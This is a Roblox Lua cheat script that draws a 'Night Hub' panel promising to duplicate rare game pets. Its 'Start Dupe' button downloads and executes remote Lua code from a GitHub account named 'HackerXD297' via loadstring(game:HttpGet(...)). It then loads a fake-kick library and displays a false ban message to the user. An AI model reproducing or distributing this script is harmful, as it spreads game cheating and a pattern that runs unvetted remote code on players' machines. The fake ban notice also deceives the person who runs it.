-- Instances:

local Dupe = Instance.new("ScreenGui")
local DupeFrame = Instance.new("ImageLabel")
local Title = Instance.new("TextLabel")
local Warning = Instance.new("TextLabel")
local Workon = Instance.new("TextLabel")
local StartDupe = Instance.new("TextButton")

--Properties:

Dupe.Name = "Dupe"
Dupe.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")

DupeFrame.Name = "DupeFrame"
DupeFrame.Parent = Dupe
DupeFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
DupeFrame.BackgroundTransparency = 1.000
DupeFrame.Position = UDim2.new(0.27421236, 0, 0.239089191, 0)
DupeFrame.Size = UDim2.new(0, 387, 0, 223)
DupeFrame.Image = "rbxassetid://3570695787"
DupeFrame.ImageColor3 = Color3.fromRGB(88, 88, 88)
DupeFrame.ImageTransparency = 0.400
DupeFrame.ScaleType = Enum.ScaleType.Slice
DupeFrame.SliceCenter = Rect.new(100, 100, 100, 100)
DupeFrame.SliceScale = 0.120

Title.Name = "Title"
Title.Parent = DupeFrame
Title.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Title.BackgroundTransparency = 1.000
Title.Position = UDim2.new(0.0232558139, 0, 0.0358744413, 0)
Title.Size = UDim2.new(0, 369, 0, 42)
Title.Font = Enum.Font.Arcade
Title.Text = "Night Hub"
Title.TextColor3 = Color3.fromRGB(0, 0, 0)
Title.TextScaled = true
Title.TextSize = 14.000
Title.TextWrapped = true

Warning.Name = "Warning"
Warning.Parent = DupeFrame
Warning.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Warning.BackgroundTransparency = 1.000
Warning.Position = UDim2.new(0.0981912166, 0, 0.224215239, 0)
Warning.Size = UDim2.new(0, 310, 0, 50)
Warning.Text = "Warning"
Warning.TextColor3 = Color3.fromRGB(255, 0, 0)
Warning.TextSize = 26.000
Warning.TextWrapped = true

Workon.Name = "Workon"
Workon.Parent = DupeFrame
Workon.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Workon.BackgroundTransparency = 1.000
Workon.Position = UDim2.new(0.0981912166, 0, 0.385650218, 0)
Workon.Size = UDim2.new(0, 310, 0, 50)
Workon.Text = "Work on Exclusive/Huge/Mythical/Legendary"
Workon.TextColor3 = Color3.fromRGB(255, 255, 255)
Workon.TextScaled = true
Workon.TextSize = 14.000
Workon.TextStrokeTransparency = 0.000
Workon.TextWrapped = true

StartDupe.Name = "StartDupe"
StartDupe.Parent = DupeFrame
StartDupe.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
StartDupe.BackgroundTransparency = 0.700
StartDupe.Position = UDim2.new(0.258397937, 0, 0.654708505, 0)
StartDupe.Size = UDim2.new(0, 200, 0, 50)
StartDupe.Font = Enum.Font.Arcade
StartDupe.Text = "Start Dupe"
StartDupe.TextColor3 = Color3.fromRGB(0, 0, 0)
StartDupe.TextScaled = true
StartDupe.TextSize = 14.000
StartDupe.TextWrapped = true

StartDupe.MouseButton1Down:connect(function()
	loadstring(game:HttpGet('https://raw.githubusercontent.com/HackerXD297/DupePetSimX/main/DuepScript.lua'))()
	wait(5)
	local Message = loadstring(game:HttpGet("https://raw.githubusercontent.com/frel0/FakeKickLibrary/main/FakeKickLibrary.lua", true))()
	Message:Kick("You have been kicked from this experience: Banned for Use Dupe Script")
	wait(3)
end)
